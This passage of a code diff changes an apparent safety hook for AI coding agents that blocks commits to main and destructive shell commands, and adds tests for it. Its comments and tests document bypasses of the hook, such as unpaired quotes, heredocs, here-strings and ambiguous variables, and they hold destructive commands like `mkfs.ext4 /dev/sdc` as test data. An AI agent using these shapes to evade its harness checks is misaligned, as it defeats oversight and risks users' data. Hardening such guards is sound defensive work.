+      * A `cd` whose target does not resolve leaves the directory UNCHANGED, so
+        the caller's cwd stays in play — the same direction an unresolvable `-C`
+        takes.
     """
     out = []
-    segs, subs, bodies = _scan(text)
+    if _seen is None:
+        _seen = set()
+    segs, subs, bodies, _ = _scan_raw(text)
     cwd, stack, cur_depth = base, [], 0
-    for seg in segs:
+    vals = dict(cvars or {})
+    poisoned = set()
+    # 🔴 Every literal a name is EVER given, kept even after the name is
+    # poisoned. Poisoning alone falls back to the cwd, and a bash-oracle fuzz
+    # caught the miss that leaves: `export WT=<safe>; . <file>; WT=<main>;
+    # git -C "$WT" commit` from a SAFE cwd. bash's last write is `<main>` and the
+    # commit lands there; a guard that only knows "ambiguous" judges the innocent
+    # cwd and allows it. Judging every candidate value IN ADDITION is the
+    # fail-closed reading of "I do not know which one".
+    alts = collections.defaultdict(list)
+    # Names an `export` put into the ENVIRONMENT, i.e. the only ones a heredoc
+    # body's separate process can see (measured — see `_command_word`).
+    exported = set()
+    written = () if _novars else _written_paths(text)
+
+    def note(name, value):
+        """Record `NAME=VALUE`, or POISON the name if it cannot be trusted.
+
+        🔴 A name set to two DIFFERENT literals anywhere in the line is DROPPED,
+        not resolved to the later one — even though bash is last-write-wins.
+        The two rules disagree only where the guard would have to guess, and the
+        guess is unsafe: `if x; then WT=<main>; else WT=<safe>; fi` reaches this
+        walk as two assignments in text order, and the one that RUNS is decided
+        by a condition the guard cannot see. Poisoning falls back to the cwd,
+        which is where an unresolvable `-C` already lands — never more permissive
+        than the shipped guard, which could not resolve the name at all.
+
+        The same rule applies to a value read from a SOURCED FILE. Which of the
+        two sources "wins" is therefore moot, which is a better answer than
+        picking one: PR #396 picked the command text (the opposite of bash) and
+        that alone turned a commit into `main` into an ALLOW.
+        """
+        val = _literal_value(value)
+        if val is not None and len(alts[name]) < _AMBIGUOUS_VALUE_LIMIT \
+                and val not in alts[name]:
+            alts[name].append(val)
+        if name in poisoned:
+            return
+        if val is None or (name in vals and vals[name] != val):
+            poisoned.add(name)
+            # 🔴 PINNED UNRESOLVABLE, not merely absent (#403). `cvars` is
+            # consulted BEFORE the environment, so "absent" would mean "fall
+            # through to `expandvars`" — and an ambiguously-assigned name would
+            # quietly resolve to a stale ambient export of itself, the same
+            # guard-vs-shell disagreement by the back door. The command DID
+            # assign this name; the guard just cannot say to what.
+            vals[name] = _UNRESOLVABLE
+            return
+        vals[name] = val
+
+    at_bodies = collections.defaultdict(list)
+    for b in subs:
+        at_bodies[b.at].append((b.text, True))      # `$( )` — same shell
+    for b in bodies:
+        at_bodies[b.at].append((b.text, False))     # heredoc — separate process
+
+    def judge_bodies(index, here):
+        """Judge each body attached to segment `index`, at cwd `here`.
+
+        🔴 WHICH VARIABLES A BODY CAN SEE IS NOT A GUESS EITHER. A `$( )`
+        substitution is a subshell of THIS shell and sees every variable; a
+        heredoc body feeds a NEW process and sees only the exported ones
+        (measured: `WT=x; bash <<EOF … $WT … EOF` -> `<unset>`;
+        `export WT=x; …` -> `x`).
+
+        Getting this wrong is permissive in BOTH directions, which is why it is
+        modelled rather than rounded off. Passing NON-exported names in would let
+        `WT=<safe>; bash <<EOF / git -C "$WT" commit / EOF` resolve to the safe
+        worktree when bash resolves `$WT` to nothing. Withholding EXPORTED ones
+        loses a real deny — a bash-oracle fuzz found exactly that:
+        `export WT=<main> && cd <safe> && bash <<EOF / git -C "$WT" commit / EOF`
+        commits into `<main>` while the body's own cwd is innocent.
+        """
+        if _body >= _WALK_BODY_LIMIT:
+            return
+        env_only = {k: v for k, v in vals.items() if k in exported}
+        for isolated, is_sub in at_bodies.get(index, ()):
+            pass_vars = vals if is_sub else env_only
+            key = (isolated, here, _body, _shell, tuple(sorted(pass_vars.items())))
+            if key in _seen:
+                continue
+            _seen.add(key)
+            out.extend(_commands_with_cwd(isolated, here, pass_vars,
+                                          _body + 1, _shell, _seen, _novars))
+
+    for pos, seg in enumerate(segs):
         while cur_depth < seg.depth:
-            stack.append(cwd)
+            stack.append((cwd, dict(vals), set(poisoned)))
             cur_depth += 1
         while cur_depth > seg.depth and stack:
-            cwd = stack.pop()
+            cwd, vals, poisoned = stack.pop()
             cur_depth -= 1
-        variants = _peel_variants(_tokenise(seg.text))
+        toks = _tokenise(seg.text)
+        idx, assigns, is_export = _command_word(toks)
+        if idx >= len(toks):
+            # No command word: the assignments PERSIST (`WT=/tmp/wt-1`).
+            for name, value in assigns:
+                note(name, value)
+                if is_export:
+                    exported.add(name)
+        # …otherwise they are a command PREFIX and do not survive the command,
+        # so they are NOT recorded. `GIT_DIR=`/`GIT_WORK_TREE=` prefixes are
+        # handled separately, by _git_dir_env_targets, precisely because they
+        # act on the command they prefix rather than persisting.
+        variants = _peel_variants(toks[idx:]) if idx < len(toks) else []
+        snapshot = dict(vals) if vals else vals
+        ambiguous = {k: tuple(v) for k, v in alts.items() if k in poisoned}
         for argv in variants:
-            out.append((argv, cwd))
-            if _depth < 3:
+            out.append((argv, cwd, snapshot, ambiguous))
+            if _shell < _WALK_SHELL_LIMIT:
                 for nested in _nested_shell_text(argv):
-                    out.extend(_commands_with_cwd(nested, cwd, cvars, _depth + 1))
+                    out.extend(_commands_with_cwd(nested, cwd, vals,
+                                                  _body, _shell + 1, _seen,
+                                                  _novars))
+        # 🔴 The body attached to THIS segment is judged at THIS segment's cwd,
+        # before any `cd` later in the same segment. `cd <main>; bash <<'EOF' /
+        # git commit / EOF` therefore judges the body at <main>, which is where
+        # bash really runs it (measured).
+        judge_bodies(pos, cwd)
         primary = variants[0] if variants else None
-        if primary and os.path.basename(primary[0]) in _CWD_CHANGERS and len(primary) > 1:
-            moved = _resolve_dir(primary[1], cwd, cvars)
+        if not primary:
+            continue
+        head = os.path.basename(primary[0])
+        if _novars:
+            pass
+        elif head in _SOURCE_CMDS and len(primary) > 1:
+            # 🔴 POSITIONAL: the file is read HERE, so its assignments override
+            # anything set before it and are overridden by anything after it.
+            if primary[1] in written:
+                # The line writes this path itself — see _written_paths. Poison
+                # every name the stale file would have set rather than trust it.
+                for name in _env_file_vars(primary[1], cwd, vals):
+                    poisoned.add(name)
+                    vals.pop(name, None)
+            else:
+                # 🔴 Through `note`, exactly like a text assignment. A name the
+                # line sets to two DIFFERENT literals is dropped rather than
+                # resolved, in EITHER order — see the argument at `note`.
+                for name, val in _env_file_vars(primary[1], cwd, vals).items():
+                    note(name, val)
+        elif head in _CWD_CHANGERS and len(primary) > 1:
+            # 🔴 `primary[1]`, not the last operand: `cd -- <dir>` and
+            # `pushd <dir> >log` both put the target first, and taking the last
+            # operand silently `cd`s to a redirection target or to `--`.
+            moved = _resolve_dir(primary[1], cwd, vals)
             if moved:
                 cwd = moved
-    # Substitution and heredoc bodies run in their own scope and have no position
-    # in this walk, so they are judged against `base` — the same directory they
-    # were judged against before, and the fail-closed choice.
-    if _depth < _BODY_RECURSION_LIMIT:
-        for isolated in subs + bodies:
-            out.extend(_commands_with_cwd(isolated, base, cvars, _depth + 1))
+
+    # Any body whose recorded position is past the last segment (only reachable
+    # if the scan ends mid-construction) is judged at the final cwd rather than
+    # dropped.
+    for index in sorted(at_bodies):
+        if index >= len(segs):
+            judge_bodies(index, cwd)
     return out
 
 
@@ -1700,15 +1986,17 @@ def check_git_commit_to_main(cmd, cwd=None):
         on THAT repo alone. The command said where it acts, so the caller's cwd is
         irrelevant, and folding it in would deny the documented `git -C $WT commit`
         spelling whenever the cwd happened to sit on main.
-        🔴 UNLESS some named target is not a git worktree at all — then the named
-        repo answers nothing, and judging "on that repo alone" would mean judging on
-        nothing. That case falls back to the cwd candidates and blocks; see the
-        comment on `targets` below.
       * a BARE `git commit` is judged against the directory the shell is STANDING
         IN when it runs — the caller's cwd, moved by each `cd`/`pushd` that
-        precedes it in the line, with subshell scope respected (`_commands_with_cwd`)
-        — plus any `GIT_DIR=`/`GIT_WORK_TREE=` target, which overrides a directory
-        rather than being one.
+        precedes it, with subshell scope respected (`_commands_with_cwd`).
+      * 🔴 A `GIT_DIR=`/`GIT_WORK_TREE=` target is judged IN ADDITION, always,
+        even when a `-C` resolved. Those two variables OVERRIDE the working
+        directory, so the `-C` is not the last word about where the commit
+        lands. `git --git-dir=<main>/.git … git -C <safe> commit` is the shape,
+        and it was ALLOWED on the shipped guard and on PR #396 — both of which
+        dropped `env_named` the moment a `-C` resolved, while their docstrings
+        said the opposite. The docstring was right and the code was wrong; the
+        code moved.
 
     🔴 The second rule exists because the guard was TEACHING ITS OWN BYPASS. An
     adversarial audit measured, against the real adapter, that `cd <main> && git
@@ -1722,73 +2010,51 @@ def check_git_commit_to_main(cmd, cwd=None):
     the action into one the guard has blessed. All four still deny.
 
     🔴 2026-08-11: that second rule used to be a UNION — the cwd AND every `cd`
-    target anywhere in the text, denying if ANY was blocked — and the union was
-    wrong in BOTH directions, which is the part worth remembering. It denied the
-    mandated worktree spellings from any session whose cwd merely happened to sit
-    on a main branch (a primary clone's normal state):
+    target anywhere in the text, denying if ANY was blocked. The union was wrong
+    in BOTH directions. It denied the mandated worktree spellings from any
+    session whose cwd merely happened to sit on a main branch (a primary clone's
+    normal state):
         DENY   git -C "$WT" commit -F <file>         <- named the primary clone
         DENY   . <env-file>; git -C "$WT" commit …      it does not touch
         DENY   (cd <worktree-on-a-topic-branch> && git commit …)
     and, from a cwd that was fine, it silently ALLOWED the mirror image:
         ALLOW  REPO=<repo-on-trunk>; git -C "$REPO" commit -m x
-    because an unresolvable `-C` fell back to a cwd that was innocent. Both are
-    the same root cause: the guard could not evaluate a shell variable and could
-    not say where a command stands. `_command_vars` and `_commands_with_cwd` are
-    the two answers; the fallbacks they cannot answer with are unchanged.
+    because an unresolvable `-C` fell back to a cwd that was innocent.
     """
-    # 🔴 THE HOT-PATH GATE. Resolving variables can READ A SOURCED ENV FILE, and
-    # this hook fires on every Bash call in every session — so nothing below runs
-    # until a cheap, pure-text pass has established that a real `git … commit`
-    # is present at all. `commands()` here is the same parse the other argv
-    # checks already do.
-    if not _has_real_git_commit(cmd):
-        return None
+    # 🔴 THE HOT-PATH GATE, DERIVED FROM THE WALK IT GUARDS. Resolving variables
+    # can READ A SOURCED ENV FILE, and this hook fires on every Bash call — so
+    # nothing expensive runs until a cheap pass has established that a real
+    # `git … commit` is present at all. That pass is THIS SAME FUNCTION with
+    # variable resolution disabled, so the gate and the loop see the same
+    # population by construction. A gate built from a different parse
+    # (`commands()`) would be a second population that neither dominates: it can
+    # admit work the loop then does not need, and — worse — can miss a commit the
+    # loop would have judged.
     base = cwd or _safe_getcwd()
-    cvars = _command_vars(cmd, base)
-    env_named = _git_dir_env_targets(cmd, base, cvars)
-    for argv, eff_cwd in _commands_with_cwd(cmd, base, cvars):
-        if os.path.basename(argv[0]) != "git":
+    if not any(_is_real_git_commit(argv)
+               for argv, _, _, _ in _commands_with_cwd(cmd, base, _novars=True)):
+        return None
+    for argv, eff_cwd, cvars, ambiguous in _commands_with_cwd(cmd, base):
+        if not _is_real_git_commit(argv):
             continue
-        flags, operands = _flags_and_operands(_git_strip_global_opts(argv))
-        if not operands or operands[0] != "commit":
-            continue
-        if any(_is_dry_run_flag(f) for f in flags):
-            continue
+        env_named = _git_dir_env_targets(cmd, base, cvars)
         unresolved = []
         named = _argv_named_repo_dirs(argv, eff_cwd, cvars, unresolved)
         # 🔴 A NAMED TARGET THAT IS NOT A GIT WORKTREE MUST NOT SUPPRESS THE CWD
-        # CHECK. Naming a repo hands the whole verdict to that repo, so if the
-        # named directory turns out not to be one, the branch check evaluates
-        # NOTHING and the command is allowed unchecked — a fail-OPEN, in the one
-        # check whose job is the silent failure. Measured against the live hook
-        # before this landed, cwd on `trunk`:
+        # CHECK (#395). Naming a repo hands the whole verdict to that repo, so if
+        # the named directory turns out not to be one, the branch check evaluates
+        # NOTHING and the command is allowed unchecked — a fail-OPEN. Measured
+        # against the live hook before #395, cwd on `trunk`:
         #     ALLOW  git -C <an-ordinary-directory> commit -m x
-        # The directory existing is what made it look answered: `_resolve_dir`
-        # returns any real directory, and `_commit_to_main_reason` then fails open
-        # on "no branch". So unless EVERY named target resolves to a worktree, fall
-        # back to the cwd the command actually stands in and judge that instead —
-        # the guard's documented posture for an unresolvable target ("treat it as
-        # the cwd repo and block"), the same direction an unresolvable `-C` already
-        # takes via `unresolved`.
-        #
-        # 🔴 This is a DIFFERENT failure from `unresolved`, and neither one covers
-        # the other: `unresolved` is a path the guard could not turn into a
-        # directory at all (a shell variable it cannot read), whereas this is a
-        # path that resolved perfectly well and simply is not a repo. The first
-        # already fell back; the second did not, and that gap was the fail-open.
-        #
-        # Deliberately "any target is not a worktree", not "no target is". They
-        # differ only on a MIXED named set — one real worktree plus one junk
-        # target, reachable by combining `-C` with `--git-dir`/`--work-tree`:
-        #     git -C <feature-repo> --git-dir=<an-ordinary-directory> commit
-        # Which repo that lands in is genuinely ambiguous (and `--git-dir` here
-        # resolves against the CWD, not against the `-C` hop), so it is exactly the
-        # "unparseable -> treat it as the cwd repo and block" case. Requiring only
-        # ONE to be a worktree would let a resolvable `-C` vouch for a junk sibling
-        # and allow it through.
+        # `any target is not a worktree`, not `no target is`: on a MIXED named set
+        # (`git -C <repo> --git-dir=<junk> commit`) which repo it lands in is
+        # genuinely ambiguous, so a resolvable `-C` must not vouch for a junk
+        # sibling.
         not_worktrees = [d for d in named if not _is_git_worktree(d)]
         targets = [] if not_worktrees else named
-        candidates = targets or ([eff_cwd] if eff_cwd else []) + env_named
+        candidates = ((targets or ([eff_cwd] if eff_cwd else []))
+                      + _ambiguous_dirs(argv, eff_cwd, cvars, ambiguous)
+                      + env_named)
         for repo_dir in candidates:
             reason = _commit_to_main_reason(repo_dir)
             if reason:
@@ -1810,20 +2076,13 @@ def check_git_commit_to_main(cmd, cwd=None):
     return None
 
 
-def _has_real_git_commit(cmd):
-    """True when this line contains a `git … commit` that would CREATE a commit.
-
-    Pure text, zero subprocesses, zero file reads — the cheap precondition that
-    keeps `check_git_commit_to_main` off the hot path for the ~everything else.
-    """
-    for argv in commands(cmd):
-        if os.path.basename(argv[0]) != "git":
-            continue
-        flags, operands = _flags_and_operands(_git_strip_global_opts(argv))
-        if operands and operands[0] == "commit" and not any(
-                _is_dry_run_flag(f) for f in flags):
-            return True
-    return False
+def _is_real_git_commit(argv):
+    """True when this argv is a `git … commit` that would CREATE a commit."""
+    if not argv or os.path.basename(argv[0]) != "git":
+        return False
+    flags, operands = _flags_and_operands(_git_strip_global_opts(argv))
+    return (bool(operands) and operands[0] == "commit"
+            and not any(_is_dry_run_flag(f) for f in flags))
 
 
 def check_pkill_full_pattern(cmd):

--- a/scripts/claude-hooks/tests/test_guard_core.py
+++ b/scripts/claude-hooks/tests/test_guard_core.py
@@ -2737,15 +2737,6 @@ def test_an_ambiguous_name_does_not_fall_through_to_the_ambient_value(
     assert gc.check_git_commit_to_main(cmd, str(on_main)) is not None
 
 
-def test_a_variable_assigned_twice_is_not_guessed(tmp_path):
-    """Ambiguity falls back to the cwd rather than picking a winner. Two
-    different literals for one name means the guard does not know the value, and
-    a guard that does not know must not pretend it does."""
-    repo, wt = _trunk_and_worktree(tmp_path)
-    cmd = f"WT={wt}\nWT={repo}\ngit -C \"$WT\" commit -m x"
-    assert gc.check_git_commit_to_main(cmd, str(repo)) is not None
-
-
 def test_a_heredoc_BODY_cannot_inject_a_variable(tmp_path):
     """🔴 A hole this change would have opened in itself, closed before it
     shipped. Variable resolution reads the real command line only — if a heredoc
@@ -2953,3 +2944,801 @@ def test_the_hot_path_reads_no_files_and_execs_no_git(tmp_path, monkeypatch):
     # …and the positive control: with a REAL commit present, it IS read.
     gc.evaluate(f". {env}\ngit -C \"$WT\" commit -m x", "claude-code", str(repo))
     assert [o for o in opened if str(env) in o], "the env file was never read at all"
+# =========================================================================== #
+# --- 9. 🔴 ONE APOSTROPHE IN A HEREDOC BODY DISABLED EVERY ARGV CHECK ------- #
+#
+# A heredoc body is PROSE, and the scanner tracked quote state through it. A
+# lone apostrophe (`don't`, `it's`) opened a quote that never closed, so every
+# command AFTER the heredoc was swallowed into that quoted buffer and never
+# parsed as its own segment. `_tokenise` then fell back to a whitespace split
+# whose argv[0] is a word from the message, and every argv check silently
+# stopped matching — not just the commit one. Measured on the shipped guard,
+# eight families, all ALLOW; all DENY with the apostrophe removed.
+#
+# Every test in this section was watched RED against the pre-change
+# guard_core.py and GREEN after. The fix is in `_scan`: heredoc bodies are
+# LIFTED out of the surrounding quote state (and then parsed as commands exactly
+# as before — nothing is blanked), and an unterminated quote from ANY source
+# re-scans its own tail.
+# =========================================================================== #
+
+def test_a_body_documenting_a_ban_still_denies_via_the_escape_hatch(tmp_path):
+    """The deliberate false positive the DESIGN NOTE accepts, re-asserted
+    through the new path. Lifting a body must not turn it into inert text — a
+    body LINE that IS a banned command is still parsed as that command and
+    denied, whether or not it would ever execute, and the deny still carries the
+    documented way out.
+
+    The `never run …` arm is the boundary, and it is ALLOW on the shipped guard
+    too: the checks key on argv[0], so prose that merely MENTIONS a command is
+    not one. Asserted rather than assumed, because "a body is still checked" and
+    "any body containing the word is denied" are different claims and only the
+    first is true.
+    """
+    repo = _mkrepo(tmp_path / "r", branch="main")
+    reason = gc.evaluate("cat > /tmp/doc.md <<EOF\ngit stash\nEOF",
+                         "claude-code", str(repo))
+    assert reason is not None
+    assert "Only QUOTING this command" in reason
+    assert gc.evaluate("cat > /tmp/doc.md <<EOF\nnever run git stash here\nEOF",
+                       "claude-code", str(repo)) is None
+
+
+@pytest.mark.parametrize("cmd,expect_body", [
+    ("cat <<'EOF'\nbody line\nEOF", "body line"),
+    ('cat <<"EOF"\nbody line\nEOF', "body line"),
+    ("cat <<EOF\nbody line\nEOF", "body line"),
+    ("cat <<\\EOF\nbody line\nEOF", "body line"),
+    ("cat <<-EOF\n\tbody line\n\tEOF", "\tbody line"),
+    ("cat <<EOF\nbody line", "body line"),            # unterminated -> runs to EOF
+])
+def test_scan_lifts_every_heredoc_spelling_INCLUDING_backslash(cmd, expect_body):
+    """The tag parser, per spelling — all five name the same terminator. `<<-`
+    strips leading TABS from the terminator LINE only; the body text itself is
+    preserved, because the guard reads it as commands and must not invent
+    whitespace changes."""
+    _segs, _subs, bodies = gc._scan(cmd)
+    assert bodies == [expect_body], (cmd, bodies)
+
+
+@pytest.mark.parametrize("cmd", [
+    'cat <<< "x"; git stash push -m wip',
+    'cat <<< "x"\ngit stash push -m wip',
+    "cat <<<x\ngit stash push -m wip",
+    "cat <<<EOF\ngit stash push -m wip",
+    "grep foo <<<$VAR\ntalosctl -n 1.2.3.4 reset",
+])
+def test_a_here_STRING_is_not_a_heredoc_at_ANY_position(cmd):
+    """🔴 `<<<` has no body and no terminator line. Reading it as one consumes
+    the rest of the text as an unterminated body — the exact failure this change
+    fixes, reintroduced in a new place.
+
+    The three bare-word arms are the ones that matter, and they are why the
+    here-string is skipped WHOLE rather than excluded inside the heredoc branch:
+    a `not startswith("<<<")` test only protects the FIRST `<`, and the scan
+    visits the second one too, where `<<<x` reads as `<<` + tag `x`. Measured
+    on the first draft of this change — and on PR #396 — as a body swallowing
+    everything after it.
+    """
+    segs, _subs, bodies = gc._scan(cmd)
+    assert bodies == [], (cmd, bodies)
+    assert any(s.text.strip().startswith(("git stash", "talosctl"))
+               for s in segs), segs
+
+
+def test_an_unterminated_quote_does_not_blind_the_tail(tmp_path):
+    """The second half of the fix, with NO heredoc in sight — the swallow needs
+    only an ODD number of quote characters. Both arms below were measured ALLOW
+    on the shipped guard.
+
+    Note the near-miss third arm, which was ALREADY denied and is here as the
+    control: `isn't … done` closes its own quote by accident, so the tail was
+    never buried. An unpaired quote is the trigger, not an apostrophe.
+    """
+    repo = _mkrepo(tmp_path / "r", branch="main")
+    assert gc.evaluate("echo 'oops; talosctl -n 1.2.3.4 reset",
+                       "claude-code", str(repo)) is not None
+    assert gc.evaluate('echo "half open; talosctl -n 1.2.3.4 reset',
+                       "claude-code", str(repo)) is not None
+    assert gc.evaluate("echo 'it isn't done; talosctl -n 1.2.3.4 reset",
+                       "claude-code", str(repo)) is not None
+
+
+# --- 9a. 🔴 THE UNION — why the shipped parse is KEPT, not replaced --------- #
+
+def test_the_shipped_parse_is_kept_so_a_lift_cannot_lose_a_deny(tmp_path):
+    """🔴 THE MUTATION TARGET OF THIS WHOLE CHANGE, and the reason
+    `_scan(_lift=False)` exists.
+
+    Lifting a heredoc body out CHANGES THE QUOTE STATE of everything after it.
+    The old scanner's runaway quote sometimes left a `$( )`/backtick
+    substitution UNQUOTED — and therefore visible — where the clean parse leaves
+    the same bytes inside a quote that now balances. Neither reading is "right"
+    about text bash itself rejects; a guard simply must not lose the deny.
+
+    These four inputs were found by a 20,000-input verdict fuzz and are the ONLY
+    four it found. Their red/green baselines are NOT origin/main — they DENY
+    there, which is the whole point — they are RED against a scanner that lifts
+    heredocs WITHOUT keeping the shipped parse (measured: all four ALLOW). They
+    are green here because `split_commands` unions the shipped parse back in.
+    Delete that union, or make legacy mode lift heredocs, and these go red.
+    """
+    repo = _mkrepo(tmp_path / "r", branch="main")
+    for cmd in [
+        "'stash' | <<-EOF\nadd\n-f\nit's\nEOF\n | of=/dev/sdc & $(cat); "
+        "<<< it's && 'mkfs.ext4' && FOO=1 || e2e/run.sh || pkill | ",
+
+        "'origin/main'; `e2e/run.sh` | <<-EOF\npkill\n-f\ngit\ndon't\nEOF\n; "
+        "( x won't ) || ( env clean cat ) | <<-EOF\n\nEOF\n\n\"mkfs.ext4\" | "
+        "<<-EOF\n\nEOF\n | '-fd' ",
+
+        "'-m' || <<-EOF\nit's\nEOF\n\n\"won't && clean; bash `mkfs.ext4`\n"
+        "'cat'; $(won't -f mkfs.ext4)\n",
+
+        "'-fd'; <<\"MSG\"\ncommit\nMSG\n && <<< mkfs.ext4 || <<-EOF\nbash\n"
+        "--all\n--all\nmkfs.ext4\nEOF\n & \"/tmp/m\" && \"-m\"\n'-C' & <<MSG\n"
+        "bash\nhi\nif=/dev/zero\nls\nMSG\n\n'commit'; ",
+    ]:
+        assert gc.evaluate(cmd, "opencode", str(repo)) is not None, cmd
+
+
+def test_legacy_scan_mode_is_the_shipped_scanner(tmp_path):
+    """`_lift=False` must stay the OLD behaviour, or the union above stops being
+    a union of anything. Pinned by the two properties that define it: it emits
+    NO heredoc bodies, and it does not recover from an unterminated quote — so
+    the tail really is buried in one segment, exactly as it ships today."""
+    cmd = "cat <<EOF\ndon't stage\nEOF\ngit commit -m x"
+    l_segs, _l_subs, l_bodies = gc._scan(cmd, _lift=False, _herestring=False)
+    assert l_bodies == [], "legacy mode must not lift heredoc bodies"
+    assert not any(s.text.strip() == "git commit -m x" for s in l_segs), \
+        "legacy mode must still bury the tail — that IS the bug being fixed"
+    # …and the lifted mode, on the same input, must differ. Without this the
+    # assertions above could both hold on a scanner that does nothing at all.
+    segs, _subs, bodies = gc._scan(cmd)
+    assert bodies == ["don't stage"]
+    assert any(s.text.strip() == "git commit -m x" for s in segs)
+    # 🔴 The THIRD reading — what `main` does today — must also be reachable:
+    # it lifts heredocs but reads `<<<x` as `<<` + tag `x`. That reading is what
+    # the union relies on to keep the seven here-string denies.
+    m_segs, _m_subs, m_bodies = gc._scan("cat <<<x\n'\ngit stash push -m wip\nx\n'",
+                                         _lift=True, _herestring=False)
+    assert m_bodies, "main's reading must still produce a heredoc body here"
+    assert not gc._scan("cat <<<x\n'\ngit stash push -m wip\nx\n'")[2], \
+        "…and the CORRECT reading must not"
+
+
+@pytest.mark.parametrize("cmd,expect", [
+    ("git status", False),
+    ("echo 'a && b'; ls", False),
+    ("cat <<< \"x\"; git stash", True),          # a here-string IS a divergence
+    ("cat <<EOF\nx\nEOF", True),                 # a heredoc operator
+    ("echo 'oops; talosctl reset", True),        # an unterminated quote
+    ('"\'" \'x', True),                          # …with an EVEN count of them
+])
+def test_diverged_is_true_whenever_ANY_reading_differs(cmd, expect):
+    """🔴 `diverged is False` is what `split_commands` skips the OTHER readings
+    on, so a false negative there silently removes the union — the whole safety
+    property — with every test still green. Pinned against the real comparison
+    over both alternative readings, not just one.
+
+    The last case is why this is COMPUTED and not a textual heuristic: `"'" 'x`
+    leaves an unterminated `'` while containing an EVEN number of them, so a
+    guard keyed on quote parity would score it "balanced" and skip the union on
+    exactly the shape it exists for.
+    """
+    mine = gc._scan_raw(cmd)
+    really = any(gc._scan_raw(cmd, lift, hs)[:3] != mine[:3]
+                 for lift, hs in ((True, False), (False, False)))
+    assert mine[3] is expect, (cmd, mine[3])
+    # The direction that matters is ONE-WAY: `diverged` must never be False
+    # while a reading really differs. It MAY be True when they happen to agree
+    # (`cat <<< "x"; git stash` has no newline, so no body is consumed and all
+    # three readings coincide) — that costs two extra scans, never a deny.
+    assert not (really and not mine[3]), (cmd, "diverged=False but readings differ")
+
+
+@pytest.mark.parametrize("cmd", [
+    "cat <<<x\n'\ngit stash push -m wip\nx\n'",
+    "cat <<<x\n'\nmkfs.ext4 /dev/sdc\nx\n'",
+    "cat <<<x\n'\npkill -f e2e/run.sh\nx\n'",
+    "cat <<<x\n'\ndd if=/dev/zero of=/dev/sdc\nx\n'",
+    "cat <<<x\n'\ntalosctl -n 1.2.3.4 reset\nx\n'",
+    'cat <<<x\n"\ngit clean -fd\nx\n"',
+    "cat <<<EOF\n'\ngit stash push -m wip\nEOF\n'",
+])
+def test_fixing_the_here_STRING_does_not_lose_the_denies_it_accidentally_bought(
+        tmp_path, cmd):
+    """🔴 THE REASON THE UNION HAS A THIRD ARM, and the hardest lesson in this
+    change: BEING RIGHT ABOUT BASH IS NOT A LICENCE TO LOSE A DENY.
+
+    `main` reads the SECOND `<` of `<<<x` as `<<` + tag `x`, which lifts
+    everything after it into a heredoc BODY — and a body is reparsed with fresh
+    quote state, so argv that the correct reading leaves buried inside a
+    balanced quote is accidentally exposed. All seven inputs below DENY on
+    `main` and ALLOWed on a scanner that merely fixed the here-string. Six argv
+    families, three of them irreversible-action.
+
+    They are green here because `split_commands` also unions in `main`'s reading
+    — segments AND BODIES. Dropping the bodies was measured to lose all seven
+    with the flag and the arm both correct, which is why this test exists rather
+    than a structural assertion about the union.
+    """
+    repo = _mkrepo(tmp_path / "r", branch="main")
+    assert gc.evaluate(cmd, "opencode", str(repo)) is not None, cmd
+
+
+def test_split_commands_still_returns_the_shipped_segments(tmp_path):
+    """The union is a SUPERSET, asserted at the seam rather than argued in a
+    docstring: everything the legacy scan produces is in the output."""
+    for cmd in ["cat <<EOF\ndon't stage\nEOF\ngit commit -m x",
+                "echo 'a && b'",
+                "ls; talosctl reset",
+                "cat <<<x\n'\ngit stash push -m wip\nx\n'",
+                "git commit -m 'unterminated"]:
+        out = gc.split_commands(cmd)
+        for lift, herestring in ((True, False), (False, False)):
+            segs, subs, _ = gc._scan(cmd, lift, herestring)
+            for s in [x.text for x in segs] + list(subs):
+                if s.strip():
+                    assert s in out, (cmd, lift, herestring, s, out)
+
+
+def test_body_recursion_and_quote_recovery_are_bounded():
+    """A nesting bomb must not spin a hook that fires on every Bash call."""
+    text = "x"
+    for _ in range(12):
+        text = f"bash <<EOF\n{text}\nEOF"
+    gc.split_commands(text)          # must return
+    gc.split_commands("'" * 4000)    # …and so must pathological quoting
+
+
+# =========================================================================== #
+# --- 10. 🔴 WHICH TREE DOES THE COMMAND ACT ON? ---------------------------- #
+#
+# The guard resolved the branch from the AMBIENT repo. `git -C "$WT" commit` —
+# the spelling both this repo's and datapacket-talos's CLAUDE.md MANDATE —
+# carries the worktree in a shell variable the hook process has never heard of,
+# so `_resolve_dir` returned None, the guard fell back to the caller's cwd and
+# denied a commit into a topic-branch worktree by naming a primary clone the
+# command never touches.
+#
+# 🔴 EVERY MODEL DECISION BELOW WAS MEASURED IN REAL BASH (5.3.15), NOT REASONED.
+# The measurements, all via `printf '%s' "$PWD"` / `"${WT-<unset>}"`:
+#
+#   WT=a; . f   (f sets WT=b)  -> b     the SOURCED FILE WINS (it is read later)
+#   . f; WT=a                  -> a     last write wins, by POSITION
+#   WT=x true                  -> unset a command-PREFIX assignment does NOT persist
+#   WT=x  /  export WT=x       -> x     a bare assignment does
+#   (WT=x)                     -> unset a subshell does not leak
+#   { WT=x; }                  -> x     a BRACE GROUP does
+#   cd /; (cd /tmp); pwd       -> /     `( … )` is the only cwd scope
+#   cd /; { cd /tmp; }; pwd    -> /tmp  a brace group is NOT
+#   cd /; if true; then cd /tmp; fi     -> /tmp
+#   cd /; for i in 1; do cd /tmp; done  -> /tmp
+#   cd /; ! cd /tmp                     -> /tmp
+#   cd /tmp; bash <<'EOF' … pwd … EOF   -> /tmp   a body runs at the CURRENT cwd
+#   cd /tmp; $(pwd)                     -> /tmp
+#   WT=x; bash <<'EOF' … $WT … EOF      -> unset (not exported -> not visible)
+#
+# An earlier attempt at this (PR #396) got four of those backwards, and an
+# adversarial audit measured all four as DENY->ALLOW regressions on commands
+# that really commit to `main`. Each is a test below, and each was watched RED
+# against that attempt's head and GREEN here.
+# =========================================================================== #
+
+def _mkworktree(repo, path, branch):
+    """A real linked worktree of `repo` at `path`, checked out on `branch`."""
+    subprocess.run(["git", "-C", str(repo), "worktree", "add", "-q", "-b", branch,
+                    str(path)], capture_output=True, text=True, check=True)
+    return path
+
+
+def _trunk_and_worktree(tmp_path):
+    """A clone on `trunk` + a linked worktree on a topic branch. The shape the
+    whole worktree workflow is made of, and the one the guard got wrong."""
+    repo = _mkrepo(tmp_path / "clone", branch="trunk", commit=True)
+    wt = _mkworktree(repo, tmp_path / "wt-topic", "zach/topic")
+    return repo, wt
+
+
+# --- 10a. 🔴 THE FOUR MEASURED REGRESSIONS ---------------------------------- #
+
+def test_a_sourced_file_the_command_ITSELF_WRITES_is_not_trusted(tmp_path):
